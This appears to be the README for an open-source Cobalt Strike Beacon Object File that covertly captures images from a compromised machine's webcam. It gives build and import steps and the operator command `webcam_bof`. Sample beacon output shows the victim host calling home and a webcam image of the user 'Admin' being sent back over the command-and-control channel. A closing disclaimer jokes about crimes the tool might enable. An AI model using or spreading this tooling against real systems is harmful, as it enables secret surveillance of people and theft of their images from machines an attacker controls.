Webcam capture capability for Cobalt Strike, implemented as a Beacon Object File (BOF)
- git clone the repo
- run
make
- drop file to disk
- download file over beacon (Cobalt Strike only)
- download file over beacon as a screenshot (Cobalt Strike only)
- import the webcamBOF.cna script into Cobalt Strike
- use the command webcam_bof {filename} {save method 0/1/2}
beacon> webcam_bof sad.jpeg 2
[*] Running Webcam BOF by (@codex_tf2)
[+] host called home, sent: 35817 bytes
[+] received output:
[*] Initializing webcam
[+] received output:
[*] Device 0: HP 320 FHD Webcam
[+] received output:
[*] Capturing image data
[+] received output:
[*] Downloading JPEG over beacon as a screenshot
[*] received screenshot of Webcam from Admin (328kb)
Note: the following error
[*] Capturing image data
[+] received output:
[ERROR] ReadSample failed with HRESULT: 0xc00d3704
usually indicates that the webcam is currently in use.
Cobalt Strike did not originally have a built in webcam capability, nor did open source alternatives exist to my knowledge. And it was a fun (not) idea.
- Webcam code from https://github.com/OV2/WebcamImage
- Save BMP to file from https://stackoverflow.com/a/60667564
- in memory download from https://github.com/anthemtotheego/CredBandit
- bitmap to jpeg from https://github.com/WKL-Sec/HiddenDesktop
usual disclaimer here, I am not responsible for any crimes against humanity you may commit or nuclear war you may cause using this piece of poorly written code.